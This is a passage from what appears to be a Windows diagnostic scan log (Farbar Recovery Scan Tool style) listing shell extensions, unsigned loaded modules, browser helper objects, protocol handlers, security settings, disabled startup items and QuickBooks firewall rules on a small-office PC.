Carbonite.Yellow] -> {5E529433-B50E-4bef-A63B-16A6B71B071A} => C:\Program Files\Carbonite\Carbonite Backup\CarboniteNSE.dll [2021-01-21] (Carbonite, Inc. -> Carbonite, Inc.) ContextMenuHandlers1: [AccExt] -> {2A118EB5-5797-4F5E-8B3D-F4ECBA3C98E4} => C:\Program Files (x86)\Common Files\Adobe\CoreSyncExtension\CoreSync_x64.dll [2018-03-05] (Adobe Systems Incorporated -> ) ContextMenuHandlers1: [Adobe.Acrobat.ContextMenu] -> {A6595CD1-BF77-430A-A452-18696685F7C7} => C:\Program Files (x86)\Adobe\Acrobat DC\Acrobat Elements\ContextMenuShim64.dll [2021-12-24] (Adobe Inc. -> Adobe Systems Inc.) ContextMenuHandlers1: [Carbonite] -> {FE8BD682-9A64-4740-A92B-EE7E5F7FA0A5} => C:\Program Files\Carbonite\Carbonite Backup\CarboniteNSE.dll [2021-01-21] (Carbonite, Inc. -> Carbonite, Inc.) ContextMenuHandlers1: [NPDF.ShellExtension] -> {03DDC0E5-AF08-40a2-85B9-FEDF1F4A780C} => C:\Program Files (x86)\Nuance\Power PDF 21\ShellExt.dll [2017-05-16] (Nuance Communications, Inc. -> Nuance Communications, Inc.) ContextMenuHandlers1: [Nuance.SMFCDirectShellExt] -> {B080A0B4-C3ED-4E09-B92C-66D5829AA764} => C:\Program Files (x86)\Nuance\Power PDF 21\bin\SDirectShellExt.dll [2017-04-28] (ZEON CORPORATION -> Zeon International Investment Corp.) ContextMenuHandlers2: [Carbonite] -> {FE8BD682-9A64-4740-A92B-EE7E5F7FA0A5} => C:\Program Files\Carbonite\Carbonite Backup\CarboniteNSE.dll [2021-01-21] (Carbonite, Inc. -> Carbonite, Inc.) ContextMenuHandlers4: [Carbonite] -> {FE8BD682-9A64-4740-A92B-EE7E5F7FA0A5} => C:\Program Files\Carbonite\Carbonite Backup\CarboniteNSE.dll [2021-01-21] (Carbonite, Inc. -> Carbonite, Inc.) ContextMenuHandlers5: [ACE] -> {5E2121EE-0300-11D4-8D3B-444553540000} => C:\Program Files\AMD\CNext\CNext\atiacm64.dll [2019-12-04] (Advanced Micro Devices, Inc. -> Advanced Micro Devices, Inc.) ContextMenuHandlers6: [AccExt] -> {2A118EB5-5797-4F5E-8B3D-F4ECBA3C98E4} => C:\Program Files (x86)\Common Files\Adobe\CoreSyncExtension\CoreSync_x64.dll [2018-03-05] (Adobe Systems Incorporated -> ) ContextMenuHandlers6: [Adobe.Acrobat.ContextMenu] -> {A6595CD1-BF77-430A-A452-18696685F7C7} => C:\Program Files (x86)\Adobe\Acrobat DC\Acrobat Elements\ContextMenuShim64.dll [2021-12-24] (Adobe Inc. -> Adobe Systems Inc.) ==================== Codecs (Whitelisted) ==================== ==================== Shortcuts & WMI ======================== ==================== Loaded Modules (Whitelisted) ============= 2016-09-12 23:44 - 2016-09-12 23:44 - 000014848 _____ () [File not signed] [File is in use] C:\Program Files (x86)\DYMO\DYMO Label Software\Interop.DYMOPrintingSupportLib.dll 2021-05-04 04:52 - 2021-05-04 04:52 - 000945152 _____ () [File not signed] [File is in use] C:\Program Files (x86)\Intuit\QuickBooks Enterprise Solutions 21.0\CefSharp.BrowserSubprocess.Core.dll 2021-05-04 04:52 - 2021-05-04 04:52 - 001430528 _____ () [File not signed] [File is in use] C:\Program Files (x86)\Intuit\QuickBooks Enterprise Solutions 21.0\CefSharp.Core.dll 2017-11-27 10:46 - 2009-02-27 17:38 - 000139264 ____R () [File not signed] C:\Program Files (x86)\Brother\BrUtilities\BrLogAPI.dll 2021-05-04 05:07 - 2021-05-04 05:07 - 106512384 _____ () [File not signed] C:\Program Files (x86)\Intuit\QuickBooks Enterprise Solutions 21.0\libcef.dll 2021-05-04 04:52 - 2021-05-04 04:52 - 000312832 _____ () [File not signed] C:\Program Files (x86)\Intuit\QuickBooks Enterprise Solutions 21.0\libegl.dll 2021-05-04 04:52 - 2021-05-04 04:52 - 006925824 _____ () [File not signed] C:\Program Files (x86)\Intuit\QuickBooks Enterprise Solutions 21.0\libglesv2.dll 2019-07-18 11:33 - 2019-07-18 11:33 - 000017920 _____ () [File not signed] C:\Program Files\AMD\CNext\CNext\libEGL.dll 2019-07-18 11:33 - 2019-07-18 11:33 - 003567616 _____ () [File not signed] C:\Program Files\AMD\CNext\CNext\libGLESv2.dll 2018-03-13 04:47 - 2018-03-13 04:47 - 000912896 _____ () [File not signed] C:\Program Files\AMD\Performance Profile Client\aws-cpp-sdk-core.dll 2018-03-13 04:47 - 2018-03-13 04:47 - 003109888 _____ () [File not signed] C:\Program Files\AMD\Performance Profile Client\aws-cpp-sdk-s3.dll 2015-02-19 01:13 - 2015-02-19 01:13 - 000817152 _____ () [File not signed] C:\Program Files\AMD\Performance Profile Client\Device.dll 2015-02-19 01:13 - 2015-02-19 01:13 - 003650560 _____ () [File not signed] C:\Program Files\AMD\Performance Profile Client\Platform.dll 2016-11-18 01:40 - 2011-05-17 17:27 - 000028672 _____ () [File not signed] C:\Windows\jmesoft\hidhook.dll 2017-11-27 10:46 - 2005-04-22 00:36 - 000143360 _____ () [File not signed] C:\WINDOWS\system32\BrSNMP64.dll 2005-09-07 14:03 - 2005-09-07 14:03 - 000036864 ____R (Black Ice Software, Inc.) [File not signed] C:\Program Files (x86)\Nuance\PaperPort\blicectr.dll 2017-11-27 10:46 - 2012-07-13 14:09 - 000385024 ____N (Brother Industries, Ltd.) [File not signed] C:\Program Files (x86)\Browny02\BrMonitor.dll 2017-11-27 10:46 - 2012-07-14 04:53 - 000087040 _____ (Brother Industries, Ltd.) [File not signed] C:\WINDOWS\system32\BrNetSti.dll 2016-09-13 00:20 - 2016-09-13 00:20 - 000042496 _____ (DYMO) [File not signed] [File is in use] C:\Program Files (x86)\DYMO\DYMO Label Software\DYMO.DLS.Printing.Service.dll 2009-06-25 10:27 - 2009-06-25 10:27 - 000541184 _____ (Marvell Semiconductor, Inc.) [File not signed] C:\WINDOWS\System32\mvtcpmon.dll 2006-01-19 04:36 - 2006-01-19 04:36 - 001017856 _____ (Microsoft Corporation) [File not signed] C:\Program Files (x86)\Common Files\Intuit\QuickBooks\QBUpdate\dbghelp.dll 2017-11-14 13:22 - 2017-11-14 13:22 - 001017856 _____ (Microsoft Corporation) [File not signed] C:\Program Files (x86)\Intuit\QuickBooks 2020\dbghelp.dll 2021-05-04 04:52 - 2021-05-04 04:52 - 001017856 _____ (Microsoft Corporation) [File not signed] C:\Program Files (x86)\Intuit\QuickBooks Enterprise Solutions 21.0\dbghelp.dll 2009-06-25 10:25 - 2009-06-25 10:25 - 000144896 _____ (OpenSLP) [File not signed] C:\WINDOWS\System32\slp64.dll 2016-09-13 01:36 - 2016-09-13 01:36 - 000147456 _____ (Sanford L.P.) [File not signed] [File is in use] C:\Program Files (x86)\DYMO\DYMO Label Software\Framework\DYMO.Label.Framework.dll 2016-09-12 23:53 - 2016-09-12 23:53 - 000356352 _____ (Sanford, L.P.) [File not signed] [File is in use] C:\Program Files (x86)\DYMO\DYMO Label Software\DYMO.DLS.Runtime.dll 2016-09-12 23:44 - 2016-09-12 23:44 - 000342016 _____ (Sanford, L.P.) [File not signed] C:\Program Files (x86)\DYMO\DYMO Label Software\DYMOPrintingSupport.dll 2020-09-29 10:55 - 2022-03-22 15:41 - 000845824 _____ (SAP SE or an SAP affiliate company) [File not signed] C:\Users\Karin Hostetler\AppData\Local\Temp\{16AA8FB8-4A98-4757-B7A5-0FF22C0A6E33}_1704_1\dbdata17.dll 2021-05-04 04:52 - 2021-05-04 04:52 - 000814080 _____ (The Chromium Authors) [File not signed] C:\Program Files (x86)\Intuit\QuickBooks Enterprise Solutions 21.0\chrome_elf.dll 2019-07-18 11:33 - 2019-07-18 11:33 - 000031744 _____ (The Qt Company Ltd.) [File not signed] C:\Program Files\AMD\CNext\CNext\plugins\imageformats\qgif.dll 2019-07-18 11:33 - 2019-07-18 11:33 - 000039424 _____ (The Qt Company Ltd.) [File not signed] C:\Program Files\AMD\CNext\CNext\plugins\imageformats\qicns.dll 2019-07-18 11:33 - 2019-07-18 11:33 - 000031744 _____ (The Qt Company Ltd.) [File not signed] C:\Program Files\AMD\CNext\CNext\plugins\imageformats\qico.dll 2019-07-18 11:33 - 2019-07-18 11:33 - 000413696 _____ (The Qt Company Ltd.) [File not signed] C:\Program Files\AMD\CNext\CNext\plugins\imageformats\qjpeg.dll 2019-07-18 11:33 - 2019-07-18 11:33 - 000025088 _____ (The Qt Company Ltd.) [File not signed] C:\Program Files\AMD\CNext\CNext\plugins\imageformats\qsvg.dll 2019-07-18 11:33 - 2019-07-18 11:33 - 000025088 _____ (The Qt Company Ltd.) [File not signed] C:\Program Files\AMD\CNext\CNext\plugins\imageformats\qtga.dll 2019-07-18 11:33 - 2019-07-18 11:33 - 000023552 _____ (The Qt Company Ltd.) [File not signed] C:\Program Files\AMD\CNext\CNext\plugins\imageformats\qwbmp.dll 2019-07-18 11:33 - 2019-07-18 11:33 - 000519168 _____ (The Qt Company Ltd.) [File not signed] C:\Program Files\AMD\CNext\CNext\plugins\imageformats\qwebp.dll 2019-07-18 11:33 - 2019-07-18 11:33 - 001431040 _____ (The Qt Company Ltd.) [File not signed] C:\Program Files\AMD\CNext\CNext\plugins\platforms\qwindows.dll 2019-07-18 11:33 - 2019-07-18 11:33 - 001180672 _____ (The Qt Company Ltd.) [File not signed] C:\Program Files\AMD\CNext\CNext\plugins\sqldrivers\qsqlite.dll 2019-07-18 11:33 - 2019-07-18 11:33 - 000135680 _____ (The Qt Company Ltd.) [File not signed] C:\Program Files\AMD\CNext\CNext\plugins\styles\qwindowsvistastyle.dll 2019-12-04 21:23 - 2019-12-04 21:23 - 006010880 _____ (The Qt Company Ltd.) [File not signed] C:\Program Files\AMD\CNext\CNext\Qt5Core.dll 2019-07-18 11:33 - 2019-07-18 11:33 - 006345216 _____ (The Qt Company Ltd.) [File not signed] C:\Program Files\AMD\CNext\CNext\Qt5Gui.dll 2019-07-18 11:33 - 2019-07-18 11:33 - 001078272 _____ (The Qt Company Ltd.) [File not signed] C:\Program Files\AMD\CNext\CNext\Qt5Network.dll 2019-07-18 11:33 - 2019-07-18 11:33 - 000313856 _____ (The Qt Company Ltd.) [File not signed] C:\Program Files\AMD\CNext\CNext\Qt5Positioning.dll 2019-07-18 11:33 - 2019-07-18 11:33 - 004000256 _____ (The Qt Company Ltd.) [File not signed] C:\Program Files\AMD\CNext\CNext\Qt5Qml.dll 2019-07-18 11:33 - 2019-07-18 11:33 - 003802624 _____ (The Qt Company Ltd.) [File not signed] C:\Program Files\AMD\CNext\CNext\Qt5Quick.dll 2019-07-18 11:33 - 2019-07-18 11:33 - 000171008 _____ (The Qt Company Ltd.) [File not signed] C:\Program Files\AMD\CNext\CNext\Qt5QuickControls2.dll 2019-07-18 11:33 - 2019-07-18 11:33 - 001083904 _____ (The Qt Company Ltd.) [File not signed] C:\Program Files\AMD\CNext\CNext\Qt5QuickTemplates2.dll 2019-07-18 11:33 - 2019-07-18 11:33 - 000205312 _____ (The Qt Company Ltd.) [File not signed] C:\Program Files\AMD\CNext\CNext\Qt5Sql.dll 2019-07-18 11:33 - 2019-07-18 11:33 - 000329728 _____ (The Qt Company Ltd.) [File not signed] C:\Program Files\AMD\CNext\CNext\Qt5Svg.dll 2019-07-18 11:33 - 2019-07-18 11:33 - 000113152 _____ (The Qt Company Ltd.) [File not signed] C:\Program Files\AMD\CNext\CNext\Qt5WebChannel.dll 2019-07-18 11:33 - 2019-07-18 11:33 - 000376320 _____ (The Qt Company Ltd.) [File not signed] C:\Program Files\AMD\CNext\CNext\Qt5WebEngine.dll 2019-07-18 11:33 - 2019-07-18 11:33 - 092323328 _____ (The Qt Company Ltd.) [File not signed] C:\Program Files\AMD\CNext\CNext\Qt5WebEngineCore.dll 2019-07-18 11:33 - 2019-07-18 11:33 - 005560832 _____ (The Qt Company Ltd.) [File not signed] C:\Program Files\AMD\CNext\CNext\Qt5Widgets.dll 2019-07-18 11:33 - 2019-07-18 11:33 - 000463360 _____ (The Qt Company Ltd.) [File not signed] C:\Program Files\AMD\CNext\CNext\Qt5WinExtras.dll 2019-07-18 11:33 - 2019-07-18 11:33 - 000188416 _____ (The Qt Company Ltd.) [File not signed] C:\Program Files\AMD\CNext\CNext\Qt5Xml.dll 2019-07-18 11:33 - 2019-07-18 11:33 - 002888704 _____ (The Qt Company Ltd.) [File not signed] C:\Program Files\AMD\CNext\CNext\Qt5XmlPatterns.dll 2019-07-18 11:33 - 2019-07-18 11:33 - 000053760 _____ (The Qt Company Ltd.) [File not signed] C:\Program Files\AMD\CNext\CNext\QtGraphicalEffects\private\qtgraphicaleffectsprivate.dll 2019-07-18 11:33 - 2019-07-18 11:33 - 000059392 _____ (The Qt Company Ltd.) [File not signed] C:\Program Files\AMD\CNext\CNext\QtGraphicalEffects\qtgraphicaleffectsplugin.dll 2019-07-18 11:33 - 2019-07-18 11:33 - 000017408 _____ (The Qt Company Ltd.) [File not signed] C:\Program Files\AMD\CNext\CNext\QtQuick.2\qtquick2plugin.dll 2019-07-18 11:33 - 2019-07-18 11:33 - 000287232 _____ (The Qt Company Ltd.) [File not signed] C:\Program Files\AMD\CNext\CNext\QtQuick\Controls.2\qtquickcontrols2plugin.dll 2019-07-18 11:33 - 2019-07-18 11:33 - 000329216 _____ (The Qt Company Ltd.) [File not signed] C:\Program Files\AMD\CNext\CNext\QtQuick\Controls\qtquickcontrolsplugin.dll 2019-07-18 11:33 - 2019-07-18 11:33 - 000136192 _____ (The Qt Company Ltd.) [File not signed] C:\Program Files\AMD\CNext\CNext\QtQuick\Dialogs\dialogplugin.dll 2019-07-18 11:33 - 2019-07-18 11:33 - 000089088 _____ (The Qt Company Ltd.) [File not signed] C:\Program Files\AMD\CNext\CNext\QtQuick\Layouts\qquicklayoutsplugin.dll 2019-07-18 11:33 - 2019-07-18 11:33 - 000312320 _____ (The Qt Company Ltd.) [File not signed] C:\Program Files\AMD\CNext\CNext\QtQuick\Templates.2\qtquicktemplates2plugin.dll 2019-07-18 11:33 - 2019-07-18 11:33 - 000017920 _____ (The Qt Company Ltd.) [File not signed] C:\Program Files\AMD\CNext\CNext\QtQuick\Window.2\windowplugin.dll 2019-12-04 21:23 - 2019-12-04 21:23 - 000085504 _____ (The Qt Company Ltd.) [File not signed] C:\Program Files\AMD\CNext\CNext\QtWebEngine\qtwebengineplugin.dll 2017-05-05 16:25 - 2017-05-05 16:25 - 005251360 _____ (Zeon Corporation -> Zeon Corporation) [File not signed] C:\Program Files (x86)\Nuance\Power PDF 21\bin\PDFCore8_x64.dll ==================== Alternate Data Streams (Whitelisted) ======== (If an entry is included in the fixlist, only the ADS will be removed.) AlternateDataStreams: C:\ProgramData\Temp:AB1A1E3D [742] ==================== Safe Mode (Whitelisted) ================== (If an entry is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.) HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\GoToAssist Remote Support Customer => ""="Service" ==================== Association (Whitelisted) ================= ==================== Internet Explorer (Whitelisted) ========== HKU\S-1-5-21-1394640484-365018484-2708498470-1001\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://lenovo17win10.msn.com/?pc=LCTE SearchScopes: HKU\S-1-5-21-1394640484-365018484-2708498470-1001 -> DefaultScope {B18C6A76-7C50-4965-9A1B-B109B920ADCD} URL = SearchScopes: HKU\S-1-5-21-1394640484-365018484-2708498470-1001 -> {B18C6A76-7C50-4965-9A1B-B109B920ADCD} URL = BHO: Nuance PDF Conversion Toolbar Helper -> {940361F8-7F16-4498-AB43-2EFFE0235AFA} -> C:\Program Files (x86)\Nuance\Power PDF 21\Bin\SPDFIEFavClient_x64.dll [2017-02-10] (Nuance Communications, Inc. -> Zeon Corporation) BHO: LastPass Vault -> {95D9ECF5-2A4D-4550-BE49-70D42F71296E} -> C:\Program Files (x86)\LastPass\LPToolbar_x64.dll [2017-03-11] (LastPass (Marvasol Inc) -> LastPass) BHO: PlusIEEventHelper Class -> {9D137966-2E29-45C5-9B12-29D5427F8F66} -> C:\Program Files (x86)\Nuance\Power PDF 21\Bin\PlusIEContextMenu_x64.dll [2017-02-10] (Nuance Communications, Inc. -> Zeon Corporation) BHO: Adobe Acrobat Create PDF Helper -> {AE7CD045-E861-484f-8273-0445EE161910} -> C:\Program Files (x86)\Common Files\Adobe\Acrobat\WCIEActiveX\DC\x64\AcroIEFavStub.dll [2019-01-31] (Adobe Systems, Incorporated -> Adobe Systems Incorporated) BHO: Logitech SetPoint -> {AF949550-9094-4807-95EC-D1C317803333} -> C:\Program Files\Logitech\SetPointP\SetPointSmooth.dll [2015-08-25] (Logitech Inc -> Logitech, Inc.) BHO: Adobe Acrobat Create PDF from Selection -> {F4971EE7-DAA0-4053-9964-665D8EE6A077} -> C:\Program Files (x86)\Common Files\Adobe\Acrobat\WCIEActiveX\DC\x64\AcroIEFavStub.dll [2019-01-31] (Adobe Systems, Incorporated -> Adobe Systems Incorporated) BHO-x32: PlusIEEventHelper Class -> {551A852F-39A6-44A7-9C13-AFBEC9185A9D} -> C:\Program Files (x86)\Nuance\PDF Viewer Plus\Bin\PlusIEContextMenu.dll [2009-02-06] (Zeon Corporation) [File not signed] BHO-x32: Nuance PDF Conversion Toolbar Helper -> {940361F8-7F16-4498-AB43-2EFFE0235AFA} -> C:\Program Files (x86)\Nuance\Power PDF 21\Bin\SPDFIEFavClient.dll [2017-02-10] (Nuance Communications, Inc. -> Zeon Corporation) BHO-x32: LastPass Vault -> {95D9ECF5-2A4D-4550-BE49-70D42F71296E} -> C:\Program Files (x86)\LastPass\LPToolbar.dll [2017-03-11] (LastPass (Marvasol Inc) -> LastPass) BHO-x32: PlusIEEventHelper Class -> {9D137966-2E29-45C5-9B12-29D5427F8F66} -> C:\Program Files (x86)\Nuance\Power PDF 21\Bin\PlusIEContextMenu.dll [2017-02-10] (Nuance Communications, Inc. -> Zeon Corporation) BHO-x32: Adobe Acrobat Create PDF Helper -> {AE7CD045-E861-484f-8273-0445EE161910} -> C:\Program Files (x86)\Common Files\Adobe\Acrobat\WCIEActiveX\DC\AcroIEFavStub.dll [2019-01-31] (Adobe Systems, Incorporated -> Adobe Systems Incorporated) BHO-x32: Logitech SetPoint -> {AF949550-9094-4807-95EC-D1C317803333} -> C:\Program Files\Logitech\SetPointP\32-bit\SetPointSmooth.dll [2015-08-25] (Logitech Inc -> Logitech, Inc.) BHO-x32: Adobe Acrobat Create PDF from Selection -> {F4971EE7-DAA0-4053-9964-665D8EE6A077} -> C:\Program Files (x86)\Common Files\Adobe\Acrobat\WCIEActiveX\DC\AcroIEFavStub.dll [2019-01-31] (Adobe Systems, Incorporated -> Adobe Systems Incorporated) Toolbar: HKLM - LastPass Toolbar - {9f6b5cc3-5c7b-4b5c-97af-19dec1e380e5} - C:\Program Files (x86)\LastPass\LPToolbar_x64.dll [2017-03-11] (LastPass (Marvasol Inc) -> LastPass) Toolbar: HKLM - Nuance PDF Toolbar - {BED78D9C-A025-4FE9-B3BA-27E6D376A3D5} - C:\Program Files (x86)\Nuance\Power PDF 21\Bin\SPDFIEFavClient_x64.dll [2017-02-10] (Nuance Communications, Inc. -> Zeon Corporation) Toolbar: HKLM - Adobe Acrobat Create PDF Toolbar - {47833539-D0C5-4125-9FA8-0819E2EAAC93} - C:\Program Files (x86)\Common Files\Adobe\Acrobat\WCIEActiveX\DC\x64\AcroIEFavStub.dll [2019-01-31] (Adobe Systems, Incorporated -> Adobe Systems Incorporated) Toolbar: HKLM-x32 - LastPass Toolbar - {9f6b5cc3-5c7b-4b5c-97af-19dec1e380e5} - C:\Program Files (x86)\LastPass\LPToolbar.dll [2017-03-11] (LastPass (Marvasol Inc) -> LastPass) Toolbar: HKLM-x32 - Nuance PDF Toolbar - {BED78D9C-A025-4FE9-B3BA-27E6D376A3D5} - C:\Program Files (x86)\Nuance\Power PDF 21\Bin\SPDFIEFavClient.dll [2017-02-10] (Nuance Communications, Inc. -> Zeon Corporation) Toolbar: HKLM-x32 - Adobe Acrobat Create PDF Toolbar - {47833539-D0C5-4125-9FA8-0819E2EAAC93} - C:\Program Files (x86)\Common Files\Adobe\Acrobat\WCIEActiveX\DC\AcroIEFavStub.dll [2019-01-31] (Adobe Systems, Incorporated -> Adobe Systems Incorporated) Toolbar: HKU\S-1-5-21-1394640484-365018484-2708498470-1001 -> Adobe Acrobat Create PDF Toolbar - {47833539-D0C5-4125-9FA8-0819E2EAAC93} - C:\Program Files (x86)\Common Files\Adobe\Acrobat\WCIEActiveX\DC\x64\AcroIEFavStub.dll [2019-01-31] (Adobe Systems, Incorporated -> Adobe Systems Incorporated) DPF: HKLM-x32 {D0659405-AD2E-4195-B67E-8B3AC42D763E} hxxps://c8.qbo.intuit.com/c8/v1712.1280/qboax11.cab Handler-x32: intu-help-qb10 - {E795042F-8A29-42E4-B265-2C7AB38E8AEE} - C:\Program Files (x86)\Intuit\QuickBooks 2017\HelpAsyncPluggableProtocol.dll [2019-12-15] (Intuit, Inc. -> Intuit, Inc.) Handler-x32: intu-help-qb11 - {5AFDE6E8-AD0F-450B-818F-21D1CDC2E3EE} - C:\Program Files (x86)\Intuit\QuickBooks 2018\HelpAsyncPluggableProtocol.dll [2020-12-09] (Intuit, Inc. -> Intuit, Inc.) Handler-x32: intu-help-qb12 - {665F2BD4-8216-400B-9706-865D2B771E27} - C:\Program Files (x86)\Intuit\QuickBooks 2019\HelpAsyncPluggableProtocol.dll [2021-09-17] (Intuit, Inc. -> Intuit, Inc.) Handler-x32: intu-help-qb13 - {75EC4BB0-9AC5-4AF7-A9CE-38A34557E27C} - C:\Program Files (x86)\Intuit\QuickBooks Enterprise Solutions 20.0\HelpAsyncPluggableProtocol.dll [2021-09-16] (Intuit, Inc. -> Intuit, Inc.) Handler-x32: intu-help-qb14 - {C854407F-AA78-4036-A9C1-54EBA9BD3608} - C:\Program Files (x86)\Intuit\QuickBooks 2021\HelpAsyncPluggableProtocol.dll [2021-10-11] (Intuit, Inc. -> Intuit, Inc.) Handler-x32: intu-help-qb3 - {c5e479ea-0a65-4b05-8c6c-2fc8cc682eb4} - C:\Program Files (x86)\Intuit\QuickBooks 2010\HelpAsyncPluggableProtocol.dll [2013-02-01] (Intuit, Inc. -> Intuit, Inc.) Handler-x32: intu-help-qb5 - {867FCB77-9823-4cd6-8210-D85F968D466F} - C:\Program Files (x86)\Intuit\QuickBooks 2012\HelpAsyncPluggableProtocol.dll [2021-02-02] (Intuit, Inc. -> Intuit, Inc.) Handler-x32: intu-help-qb6 - {6898B29B-BF49-43cb-A0B1-D0B9496AF491} - C:\Program Files (x86)\Intuit\QuickBooks 2013\HelpAsyncPluggableProtocol.dll [2016-05-09] (Intuit, Inc. -> Intuit, Inc.) Handler-x32: intu-help-qb8 - {CD17C364-2EC8-4929-91A9-C4839A20E909} - C:\Program Files (x86)\Intuit\QuickBooks 2015\HelpAsyncPluggableProtocol.dll [2017-04-25] (Intuit, Inc. -> Intuit, Inc.) Handler-x32: intu-help-qb9 - {C1252096-0E63-4C06-A38B-03DF9A16AA12} - C:\Program Files (x86)\Intuit\QuickBooks 2016\HelpAsyncPluggableProtocol.dll [2017-12-12] (Intuit, Inc. -> Intuit, Inc.) Handler-x32: qbwc - {FC598A64-626C-4447-85B8-53150405FD57} - C:\Windows\SysWOW64\mscoree.dll [2019-12-07] (Microsoft Windows -> Microsoft Corporation) (If an entry is included in the fixlist, it will be removed from the registry.) IE trusted site: HKU\S-1-5-21-1394640484-365018484-2708498470-1001\...\intuit.com -> hxxps://qbo.intuit.com ==================== Hosts content: ========================= (If needed Hosts: directive could be included in the fixlist to reset Hosts.) 2016-07-16 07:47 - 2016-07-16 07:45 - 000000824 _____ C:\WINDOWS\system32\drivers\etc\hosts ==================== Other Areas =========================== (Currently there is no automatic fix for this section.) HKU\S-1-5-21-1394640484-365018484-2708498470-1001\Control Panel\Desktop\\Wallpaper -> I:\Pics\CD\Hostetler\PETS\All three\00000 15 02 06.JPG HKU\S-1-5-21-1394640484-365018484-2708498470-1002\Control Panel\Desktop\\Wallpaper -> C:\Windows\Web\Wallpaper\Windows\img0.jpg HKU\S-1-5-21-1394640484-365018484-2708498470-1003\Control Panel\Desktop\\Wallpaper -> C:\Windows\Web\Wallpaper\Windows\img0.jpg HKU\S-1-5-21-1394640484-365018484-2708498470-1006\Control Panel\Desktop\\Wallpaper -> C:\Windows\Web\Wallpaper\Windows\img0.jpg HKU\S-1-5-21-1394640484-365018484-2708498470-1007\Control Panel\Desktop\\Wallpaper -> C:\Windows\Web\Wallpaper\Windows\img0.jpg HKU\S-1-5-21-1394640484-365018484-2708498470-1008\Control Panel\Desktop\\Wallpaper -> C:\Windows\Web\Wallpaper\Windows\img0.jpg HKU\S-1-5-21-1394640484-365018484-2708498470-1009\Control Panel\Desktop\\Wallpaper -> C:\Windows\Web\Wallpaper\Windows\img0.jpg HKU\S-1-5-21-1394640484-365018484-2708498470-1010\Control Panel\Desktop\\Wallpaper -> C:\Windows\Web\Wallpaper\Windows\img0.jpg DNS Servers: 192.168.1.1 HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 5) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1) HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer => (SmartScreenEnabled: Prompt) Windows Firewall is enabled. ==================== MSCONFIG/TASK MANAGER disabled items == (If an entry is included in the fixlist, it will be removed.) HKLM\...\StartupApproved\StartupFolder: => "Intuit Data Protect.lnk" HKLM\...\StartupApproved\StartupFolder: => "QuickBooks Web Connector.lnk" HKLM\...\StartupApproved\Run32: => "Adobe Creative Cloud" HKLM\...\StartupApproved\Run32: => "MobisynapseSyncHelper" HKLM\...\StartupApproved\Run32: => "DymoOfficeHelper" HKLM\...\StartupApproved\Run32: => "DYMOWebApi" HKLM\...\StartupApproved\Run32: => "ExpressVPNNotificationService" HKU\S-1-5-21-1394640484-365018484-2708498470-1001\...\StartupApproved\Run: => "OneDrive" ==================== FirewallRules (Whitelisted) ================ (If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.) FirewallRules: [{D828E6DF-25C5-45B3-9938-E3A291F8920A}] => (Allow) C:\Program Files (x86)\Intuit\QuickBooks Enterprise Solutions 20.0\filemanagement.exe (Intuit, Inc. -> ) FirewallRules: [{D1FEA7C0-2F71-4FB3-8AC0-9E501D6D3392}] => (Allow) C:\Program Files (x86)\Intuit\QuickBooks Enterprise Solutions 20.0\filemanagement.exe (Intuit, Inc. -> ) FirewallRules: [{626F6D5D-1B51-49F6-B3E1-C3EF74D89716}] => (Allow) C:\Program Files (x86)\Intuit\QuickBooks Enterprise Solutions 20.0\dbmanagerexe.exe (Intuit, Inc. -> Intuit Inc.) FirewallRules: [{BF1C6A90-6997-4E91-A77F-D3C9A0491949}] => (Allow) C:\Program Files (x86)\Intuit\QuickBooks Enterprise Solutions 20.0\dbmanagerexe.exe (Intuit, Inc. -> Intuit Inc.) FirewallRules: [{1C0A75C3-4E99-4423-AF58-1BAD3EC7E1BD}] => (Allow) C:\Program Files (x86)\Intuit\QuickBooks 2020\filemanagement.exe (Intuit, Inc. -> ) FirewallRules: [{876D85F5-FB04-4898-AE0E-3477F2A91226}] => (Allow) C:\Program Files (x86)\Intuit\QuickBooks 2020\filemanagement.exe (Intuit, Inc. -> ) FirewallRules: [{44728EEF-B903-458D-890A-3B87565A219D}] => (Allow) C:\Program Files (x86)\Intuit\QuickBooks 2020\dbmanagerexe.exe (Intuit, Inc. -> Intuit Inc.) FirewallRules: [{BF72D947-D5B4-4E3B-ACB0-DFA2B4059265}] => (Allow) C:\Program Files (x86)\Intuit\QuickBooks 2020\dbmanagerexe.exe (Intuit, Inc. -> Intuit Inc.) FirewallRules: [{FD6C4D5A-706A-4354-AF3F-9A17C1CA19BA}] => (Allow) C:\Program Files (x86)\Intuit\QuickBooks Enterprise Solutions 19.0\filemanagement.exe (Intuit, Inc. -> ) FirewallRules: [{A70EA588-2E8A-4A54-8995-0E67C4E8B890}] => (Allow) C:\Program Files (x86)\Intuit\QuickBooks Enterprise Solutions 19.0\filemanagement.exe (Intuit, Inc. -> ) FirewallRules: [{6BDD2D4F-2FEA-4674-AA7C-D93E37747B47}] => (Allow) C:\Program Files (x86)\Intuit\QuickBooks Enterprise Solutions 19.0\dbmanagerexe.exe (Intuit, Inc. -> Intuit Inc.) FirewallRules: [{77E231DC-1714-44DF-8A01-2356BDE3D4CF}] => (Allow) C:\Program Files (x86)\Intuit\QuickBooks Enterprise Solutions 19.0\dbmanagerexe.exe (Intuit, Inc. -> Intuit Inc.) FirewallRules: [{23F6F1D3-795A-4159-BF15-5B61EA379D80}] => (Allow) C:\Program Files (x86)\Intuit\QuickBooks 2019\filemanagement.exe (Intuit, Inc. -> ) FirewallRules: [{12D2DBAA-7D06-4817-AF82-3CC76A2D4E3D}] => (Allow) C:\Program Files (x86)\Intuit\QuickBooks 2019\filemanagement.exe (Intuit, Inc. -> ) FirewallRules: [{081D37B6-F832-4402-B33D-4895B0BCC058}] => (Allow) C:\Program Files (x86)\Intuit\QuickBooks 2019\dbmanagerexe.exe (Intuit, Inc. -> Intuit Inc.) FirewallRules: [{1E3D0ED9-2488-416B-9700-00E226A7E75D}] => (Allow) C:\Program Files (x86)\Intuit\QuickBooks 2019\dbmanagerexe.exe (Intuit, Inc. -> Intuit Inc.) FirewallRules: [{0ED3CCFC-7780-4352-A1DF-5FBAD2D978EE}] => (Allow) C:\Program Files (x86)\Intuit\QuickBooks Enterprise Solutions 18.0\filemanagement.exe (Intuit, Inc. -> ) FirewallRules: [{43797571-0CC2-4634-8BC0-85DB408B0418}] => 